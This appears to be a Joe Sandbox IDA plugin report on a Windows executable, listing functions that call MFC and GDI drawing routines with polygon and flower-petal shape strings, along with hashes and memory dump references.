Part of subcall function 004039C0: 6CF38500.MFC42(?,?,?), ref: 00403B8B
Part of subcall function 004039C0: Polygon.GDI32(?,?,?), ref: 00403B9A
Part of subcall function 004039C0: 6CF381F0.MFC42(?), ref: 00403BA7
Part of subcall function 004039C0: 6CF381F0.MFC42(?,?), ref: 00403BB3
Part of subcall function 004039C0: 6CEF2C70.MFC42(00000000), ref: 00403BC1
Part of subcall function 004039C0: 6CF37850.MFC42 ref: 00403BDE
Part of subcall function 004039C0: 6CF37850.MFC42 ref: 00403BFE

CopyRect.USER32(?,004384C8), ref: 00404A9E
CopyRect.USER32(?,004384C8), ref: 00404ABE
CopyRect.USER32(?,004384C8), ref: 00404ADE
CopyRect.USER32(?,004384C8), ref: 00404AFE
CopyRect.USER32(?,004384C8), ref: 00404B1E
CopyRect.USER32(?,004384C8), ref: 00404B3E
CopyRect.USER32(?,004384C8), ref: 00404B5E
CopyRect.USER32(?,004384C8), ref: 00404B7E
CopyRect.USER32(?,004384C8), ref: 00404B9E
CopyRect.USER32(?,004384C8), ref: 00404BBE
CopyRect.USER32(?,004384C8), ref: 00404BDE
CopyRect.USER32(?,004384C8), ref: 00404BFE
CopyRect.USER32(?,004384C8), ref: 00404C1E
CopyRect.USER32(?,004384C8), ref: 00404C3E
CopyRect.USER32(?,004384C8), ref: 00404C5E
CopyRect.USER32(?,004384C8), ref: 00404C7E
CopyRect.USER32(?,004384C8), ref: 00404C9E
CopyRect.USER32(?,004384C8), ref: 00404CBE
CopyRect.USER32(?,004384C8), ref: 00404CDE
CopyRect.USER32(?,004384C8), ref: 00404CFE
CopyRect.USER32(?,004384C8), ref: 00404D1E
CopyRect.USER32(?,004384C8), ref: 00404D3E
CopyRect.USER32(?,004384C8), ref: 00404D5E
CopyRect.USER32(?,004384C8), ref: 00404D7E
CopyRect.USER32(?,004384C8), ref: 00404D9E
CopyRect.USER32(?,004384C8), ref: 00404DBE
CopyRect.USER32(?,004384C8), ref: 00404DDE
CopyRect.USER32(?,004384C8), ref: 00404DFE
CopyRect.USER32(?,004384C8), ref: 00404E1E
CopyRect.USER32(?,004384C8), ref: 00404E3E
CopyRect.USER32(?,004384C8), ref: 00404E5E
CopyRect.USER32(?,004384C8), ref: 00404E7E
CopyRect.USER32(?,004384C8), ref: 00404E9E

Strings

Polygon17, xrefs: 00404C86
LeftFlowerPetal1, xrefs: 00404AE6
Polygon24, xrefs: 00404D66
Polygon19, xrefs: 00404CC6
Polygon11, xrefs: 00404BC6
Polygon28, xrefs: 00404DE6
Polygon29, xrefs: 00404E06
Polygon34, xrefs: 00404EA6
Polygon32, xrefs: 00404E66
Polygon2, xrefs: 00404AA6
Polygon18, xrefs: 00404CA6
Polygon10, xrefs: 00404BA6
LeftFlowerPetal3, xrefs: 00404B66
RightFlowerPetal2, xrefs: 00404BE6
Polygon14, xrefs: 00404C26
LeftFlowerPetal2, xrefs: 00404B46
Polygon33, xrefs: 00404E86
Polygon3, xrefs: 00404AC6
Polygon15, xrefs: 00404C46
RightFlowerPetal1, xrefs: 00404B86
BottomFlowerPetal3, xrefs: 00404D26
Polygon0, xrefs: 00404A66
Polygon31, xrefs: 00404E46
TopFlowerPetal1, xrefs: 00404DA6
TopFlowerPetal, xrefs: 00404D86
Polygon5, xrefs: 00404B06
BottoFlowerPetal2, xrefs: 00404D06
Polygon23, xrefs: 00404D46
TopFlowerPetal2, xrefs: 00404DC6
BottomFlowerPetal1, xrefs: 00404CE6
Polygon6, xrefs: 00404B26
RightFlowerPetal3, xrefs: 00404C06
Polygon1, xrefs: 00404A86
Polygon16, xrefs: 00404C66
Polygon30, xrefs: 00404E26

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: CopyRect$F381$F37850_ftol$F37080F37160F38500Polygon
String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
API String ID: 1448220572-821843137
Opcode ID: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
Instruction ID: 1b864ce688a3351c981eaee8f36bd257d0a296356b300086fb8b46b6cfa255b8
Opcode Fuzzy Hash: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
Instruction Fuzzy Hash: FAB1B1FA9A03007ED200F6619C82D6BBB6CDAF8B15F40DD0EB559610C3B9BCD304867A

Uniqueness

Uniqueness Score: -1.00%

Function 00405300 Relevance: 122.9, APIs: 35, Strings: 35, Instructions: 397
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyRect.USER32(?,004384C8), ref: 00405316

Part of subcall function 00403E10: 6CF37080.MFC42(?), ref: 00403E71
Part of subcall function 00403E10: 6CF37160.MFC42(00000005,00000000,00000000,?), ref: 00403EA1
Part of subcall function 00403E10: 6CEF2DD0.MFC42(?,00000005,00000000,00000000,?), ref: 00403F3C

CopyRect.USER32(?,004384C8), ref: 0040533E

Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403F95
Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403FBF
Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
Part of subcall function 00403E10: 6CF376C0.MFC42(00000000), ref: 00403FEA
Part of subcall function 00403E10: CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
Part of subcall function 00403E10: 6CF376C0.MFC42(00000000), ref: 00404019
Part of subcall function 00403E10: CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
Part of subcall function 00403E10: 6CEF2C70.MFC42(00000000,00000000), ref: 0040405D
Part of subcall function 00403E10: 6CF37850.MFC42 ref: 0040407A
Part of subcall function 00403E10: 6CF37850.MFC42 ref: 00404098
Part of subcall function 00403E10: 6CF37850.MFC42 ref: 004040B1
Part of subcall function 00403E10: 6CF37850.MFC42 ref: 004040CD

CopyRect.USER32(?,004384C8), ref: 0040535E

Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
Part of subcall function 00403E10: 6CF376C0.MFC42(00000000), ref: 00404053

CopyRect.USER32(?,004384C8), ref: 0040537E
CopyRect.USER32(?,004384C8), ref: 0040539E
CopyRect.USER32(?,004384C8), ref: 004053BE
CopyRect.USER32(?,004384C8), ref: 004053DE
CopyRect.USER32(?,004384C8), ref: 004053FE
CopyRect.USER32(?,004384C8), ref: 0040541E
CopyRect.USER32(?,004384C8), ref: 0040543E
CopyRect.USER32(?,004384C8), ref: 0040545E
CopyRect.USER32(?,004384C8), ref: 0040547E
CopyRect.USER32(?,004384C8), ref: 0040549E
CopyRect.USER32(?,004384C8), ref: 004054BE
CopyRect.USER32(?,004384C8), ref: 004054DE
CopyRect.USER32(?,004384C8), ref: 004054FE
CopyRect.USER32(?,004384C8), ref: 0040551E
CopyRect.USER32(?,004384C8), ref: 0040553E
CopyRect.USER32(?,004384C8), ref: 0040555E
CopyRect.USER32(?,004384C8), ref: 0040557E
CopyRect.USER32(?,004384C8), ref: 0040559E
CopyRect.USER32(?,004384C8), ref: 004055BE
CopyRect.USER32(?,004384C8), ref: 004055DE
CopyRect.USER32(?,004384C8), ref: 004055FE
CopyRect.USER32(?,004384C8), ref: 0040561E
CopyRect.USER32(?,004384C8), ref: 0040563E
CopyRect.USER32(?,004384C8), ref: 0040565E
CopyRect.USER32(?,004384C8), ref: 0040567E
CopyRect.USER32(?,004384C8), ref: 0040569E
CopyRect.USER32(?,004384C8), ref: 004056BE
CopyRect.USER32(?,004384C8), ref: 004056DE
CopyRect.USER32(?,004384C8), ref: 004056FE
CopyRect.USER32(?,004384C8), ref: 0040571E
CopyRect.USER32(?,004384C8), ref: 0040573E
CopyRect.USER32(?,004384C8), ref: 0040575E

Strings

Polygon17, xrefs: 00405546
LeftFlowerPetal1, xrefs: 004053A6
Polygon24, xrefs: 00405626
Polygon19, xrefs: 00405586
Polygon11, xrefs: 00405486
Polygon28, xrefs: 004056A6
Polygon29, xrefs: 004056C6
Polygon34, xrefs: 00405766
Polygon32, xrefs: 00405726
Polygon2, xrefs: 00405366
Polygon18, xrefs: 00405566
Polygon10, xrefs: 00405466
LeftFlowerPetal3, xrefs: 00405426
RightFlowerPetal2, xrefs: 004054A6
Polygon14, xrefs: 004054E6
LeftFlowerPetal2, xrefs: 00405406
Polygon33, xrefs: 00405746
Polygon3, xrefs: 00405386
Polygon15, xrefs: 00405506
RightFlowerPetal1, xrefs: 00405446
BottomFlowerPetal3, xrefs: 004055E6
Polygon0, xrefs: 00405326
Polygon31, xrefs: 00405706
TopFlowerPetal1, xrefs: 00405666
TopFlowerPetal, xrefs: 00405646
Polygon5, xrefs: 004053C6
BottoFlowerPetal2, xrefs: 004055C6
Polygon23, xrefs: 00405606
TopFlowerPetal2, xrefs: 00405686
BottomFlowerPetal1, xrefs: 004055A6
Polygon6, xrefs: 004053E6
RightFlowerPetal3, xrefs: 004054C6
Polygon1, xrefs: 00405346
Polygon16, xrefs: 00405526
Polygon30, xrefs: 004056E6

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: CopyRect$F37850$CreateF376Polygon$Combine_ftol$F37080F37160
String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
API String ID: 111202254-821843137
Opcode ID: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
Instruction ID: 87a306119b05220822c14238118f6d845cb676b63f2a489d8e55d3df45724c17
Opcode Fuzzy Hash: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
Instruction Fuzzy Hash: 09B1B2FA9803003ED200F661DC82D6BBB6CD9F8B11F40DE0EB559610C6B97CDB1486BA

Uniqueness

Uniqueness Score: -1.00%

Function 00404EC0 Relevance: 70.4, APIs: 20, Strings: 20, Instructions: 387
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyRect.USER32(?,004384C8), ref: 00404ED6

Part of subcall function 00403C20: 6CEF2DD0.MFC42(?), ref: 00403CFF
Part of subcall function 00403C20: _ftol.MSVCRT ref: 00403D58

CopyRect.USER32(?,004384C8), ref: 00404F10

Strings

Polygon17, xrefs: 00405077
LeftFlowerPetal1, xrefs: 00405239
Polygon31, xrefs: 00404F19
TopFlowerPetal1, xrefs: 00404F7D
Polygon2, xrefs: 0040529D
Polygon32, xrefs: 00404EE7
TopFlowerPetal, xrefs: 00404FAF
LeftFlowerPetal3, xrefs: 004051D5
BottoFlowerPetal2, xrefs: 00405013
TopFlowerPetal2, xrefs: 00404F4B
RightFlowerPetal2, xrefs: 00405171
Polygon14, xrefs: 0040510D
BottomFlowerPetal1, xrefs: 00405045
LeftFlowerPetal2, xrefs: 00405207
Polygon3, xrefs: 0040526B
Polygon15, xrefs: 004050DB
RightFlowerPetal3, xrefs: 0040513F
RightFlowerPetal1, xrefs: 004051A3
Polygon16, xrefs: 004050A9
BottomFlowerPetal3, xrefs: 00404FE1

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: CopyRect$_ftol
String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon14$Polygon15$Polygon16$Polygon17$Polygon2$Polygon3$Polygon31$Polygon32$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
API String ID: 1144628616-677921438
Opcode ID: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
Instruction ID: 8a5b5832819b54604f0eb40b5f2cfffe4246f56c5ea39582f8810119041c68d6
Opcode Fuzzy Hash: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
Instruction Fuzzy Hash: EDA1C3BB6443103AE210B259AC42EAB676CDBE8724F408C3BF958D11C1F57DDA18C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 00409E20 Relevance: 30.2, APIs: 20, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6CF016C0.MFC42 ref: 00409E42
6CF37140.MFC42 ref: 00409E51
73A24C40.GDI32(?), ref: 00409EBE
6CEFE720.MFC42(00000000), ref: 00409EC9
LPtoDP.GDI32(?,?,00000002), ref: 00409EDA
73A24C00.GDI32(?,?,?), ref: 00409EFB
6CF376C0.MFC42(00000000), ref: 00409F06

Part of subcall function 0040ABE0: 6CF38160.MFC42(?,?,00409F19,0040C6D4,00000000), ref: 0040ABED

GetMapMode.GDI32(?,0040C6D4,00000000), ref: 00409F22
6CF38460.MFC42(00000000), ref: 00409F2D
DPtoLP.GDI32(?,?,00000002), ref: 00409F3E
6CF387D0.MFC42(?,?,?), ref: 00409F57
GetWindowRect.USER32(?,?), ref: 00409F87
6CEFE6C0.MFC42(?), ref: 00409F94
6CEFFEB0.MFC42(?), ref: 00409FAD
73A24D40.GDI32(?,?,?,?,?,?,?,?,00CC0020,?,?), ref: 00409FFA
6CF38160.MFC42(?,00000000,?), ref: 0040A011
6CF38160.MFC42(?,?,?), ref: 0040A021
6CF37850.MFC42(?), ref: 0040A049
6CF01660.MFC42(?), ref: 0040A05E
6CF015D0.MFC42(?), ref: 0040A06F

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: F38160$E720F015F016F01660F37140F376F37850F38460F387ModeRectWindow
String ID:
API String ID: 4069818952-0
Opcode ID: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
Instruction ID: 387955213cf341242af21f02e85b7fd3331607f5cb7a19bffeb898acdc1f93f5
Opcode Fuzzy Hash: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
Instruction Fuzzy Hash: 997127711183409FC314DF64C88496FBBF8EBC9704F108A2EF6A693291DB79E905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00404360 Relevance: 27.2, APIs: 18, Instructions: 221
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6CF37080.MFC42(?), ref: 004043C4
6CF37160.MFC42(00000005,00000000,00000000,?), ref: 004043D9
6CEF2DD0.MFC42(?,00000005,00000000,00000000,?), ref: 00404499
_ftol.MSVCRT ref: 0040450A
_ftol.MSVCRT ref: 00404538
CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00404560
6CF376C0.MFC42(00000000), ref: 0040456B
CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404585
CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040458F
6CF376C0.MFC42(00000000), ref: 0040459A
CombineRgn.GDI32(?,?,?,00000002), ref: 004045C3
CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 004045CB
6CF376C0.MFC42(00000000), ref: 004045D4
6CEF2C70.MFC42(00000000,00000000), ref: 004045DE
6CF37850.MFC42 ref: 004045FB
6CF37850.MFC42 ref: 00404619
6CF37850.MFC42 ref: 00404632
6CF37850.MFC42 ref: 0040464E

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: F37850$CreateF376Polygon$Combine_ftol$F37080F37160
String ID:
API String ID: 339702656-0
Opcode ID: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
Instruction ID: 39bea9fad0b66382f5372ed494b3add627d4de448e91ddc4441a9f07906a4bc8
Opcode Fuzzy Hash: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
Instruction Fuzzy Hash: B09156B19083419FC310DF29C985A5BBBE4FFC4750F018A2EF999A7291DB34D814CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00403E10 Relevance: 27.2, APIs: 18, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6CF37080.MFC42(?), ref: 00403E71
6CF37160.MFC42(00000005,00000000,00000000,?), ref: 00403EA1
6CEF2DD0.MFC42(?,00000005,00000000,00000000,?), ref: 00403F3C
_ftol.MSVCRT ref: 00403F95
_ftol.MSVCRT ref: 00403FBF
CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
6CF376C0.MFC42(00000000), ref: 00403FEA
CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
6CF376C0.MFC42(00000000), ref: 00404019
CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
6CF376C0.MFC42(00000000), ref: 00404053
6CEF2C70.MFC42(00000000,00000000), ref: 0040405D
6CF37850.MFC42 ref: 0040407A
6CF37850.MFC42 ref: 00404098
6CF37850.MFC42 ref: 004040B1
6CF37850.MFC42 ref: 004040CD

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: F37850$CreateF376Polygon$Combine_ftol$F37080F37160
String ID:
API String ID: 339702656-0
Opcode ID: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
Instruction ID: d78316a0bae83b4357ed0e5d5a94130920efe7575c7a00bd962797de7769c8fd
Opcode Fuzzy Hash: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
Instruction Fuzzy Hash: 189179B1A083419FC310DF25C985A5BBBF4FF88714F118A2DF99AA7291DB34D914CB86

Uniqueness

Uniqueness Score: -1.00%

Function 004040F0 Relevance: 21.2, APIs: 14, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6CF37080.MFC42(?), ref: 00404126
6CF37160.MFC42 ref: 00404140
6CEF2DD0.MFC42(?), ref: 004041F4
_ftol.MSVCRT ref: 0040425C
_ftol.MSVCRT ref: 00404287
6CF381F0.MFC42(?), ref: 004042A7
6CF381F0.MFC42(?,?), ref: 004042B5
6CF38500.MFC42(?,?,?), ref: 004042C4
PolyPolygon.GDI32(?,?,?,?), ref: 004042DB
6CF381F0.MFC42(?), ref: 004042E8
6CF381F0.MFC42(00000000,?), ref: 004042F0
6CEF2C70.MFC42(00000000), ref: 004042FE
6CF37850.MFC42 ref: 0040431B
6CF37850.MFC42 ref: 0040433B

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: F381$F37850_ftol$F37080F37160F38500PolyPolygon
String ID:
API String ID: 3523466669-0
Opcode ID: 2b2e73ee56ccb52b1001f3b0391d252d54c9b1f95d3d559f81bec7f6def80bc2
Instruction ID: 188a373362c9c2a19894e084889eeb25583b541a2b65023392c336bd3c41df6f
Opcode Fuzzy Hash: 2b2e73ee56ccb52b1001f3b0391d252d54c9b1f95d3d559f81bec7f6def80bc2
Instruction Fuzzy Hash: BB7146B16087029FC300DF15C580A5AFBE5FFC8714F008A2EF895A3295DB34D925CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004039C0 Relevance: 21.2, APIs: 14, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6CF37080.MFC42(?), ref: 004039EF
6CF37160.MFC42 ref: 00403A26
6CEF2DD0.MFC42(?), ref: 00403AC5
_ftol.MSVCRT ref: 00403B21
_ftol.MSVCRT ref: 00403B4C
6CF381F0.MFC42(?), ref: 00403B6C
6CF381F0.MFC42(?,?), ref: 00403B7C
6CF38500.MFC42(?,?,?), ref: 00403B8B
Polygon.GDI32(?,?,?), ref: 00403B9A
6CF381F0.MFC42(?), ref: 00403BA7
6CF381F0.MFC42(?,?), ref: 00403BB3
6CEF2C70.MFC42(00000000), ref: 00403BC1
6CF37850.MFC42 ref: 00403BDE
6CF37850.MFC42 ref: 00403BFE

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: F381$F37850_ftol$F37080F37160F38500Polygon
String ID:
API String ID: 1715826439-0
Opcode ID: 6a4d64cee6b4afaafe777f2e8d15a49c18efd186f2a01d640e6d192dcb17d5eb
Instruction ID: a31888a28c910781cb5a6b2b58f142157f6f74c163650217d03e4cb0f708ac09
Opcode Fuzzy Hash: 6a4d64cee6b4afaafe777f2e8d15a49c18efd186f2a01d640e6d192dcb17d5eb
Instruction Fuzzy Hash: 647175B1A087419FC304DF25C580A0ABBF5FFC8704F108A2DF899A3295DB35D919CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B10F Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 0040B13C
__p__fmode.MSVCRT ref: 0040B151
__p__commode.MSVCRT ref: 0040B15F
__setusermatherr.MSVCRT ref: 0040B18B
_initterm.MSVCRT ref: 0040B1A1
__getmainargs.MSVCRT ref: 0040B1C4
_initterm.MSVCRT ref: 0040B1D4
GetStartupInfoA.KERNEL32(?), ref: 0040B213
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040B237
exit.MSVCRT ref: 0040B247
_XcptFilter.MSVCRT ref: 0040B259

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
Instruction ID: 92e6429448b312161c6c86a2e6f2100586677b1d17cdbc89596afef87365b123
Opcode Fuzzy Hash: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
Instruction Fuzzy Hash: 68416FB5800344EFDB209FA5D889AAE7BB8EB09714F20067FE551A72E1D7784841CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00409C80 Relevance: 15.1, APIs: 10, Instructions: 129COMMON

Download Yara Rule

APIs

Part of subcall function 00401000: CopyRect.USER32(?,0040E020), ref: 0040100D

_ftol.MSVCRT ref: 00409CF7
_ftol.MSVCRT ref: 00409D0E
_ftol.MSVCRT ref: 00409D2B
6CF39B80.MFC42(?,?,00000000,?,00000000), ref: 00409D78
GetWindowRect.USER32(?,?), ref: 00409D86
6CEFE6C0.MFC42(?), ref: 00409D93

Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 00402516
Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040253E
Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040255E
Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040257E
Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040259E
